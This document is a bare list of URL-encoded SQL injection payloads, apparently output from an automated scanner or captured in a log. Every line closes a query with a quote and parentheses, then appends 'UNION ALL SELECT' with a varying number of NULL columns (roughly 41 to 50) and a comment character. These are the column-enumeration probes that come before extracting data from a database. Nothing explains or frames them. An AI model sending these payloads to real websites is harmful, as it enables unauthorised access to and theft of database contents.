1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 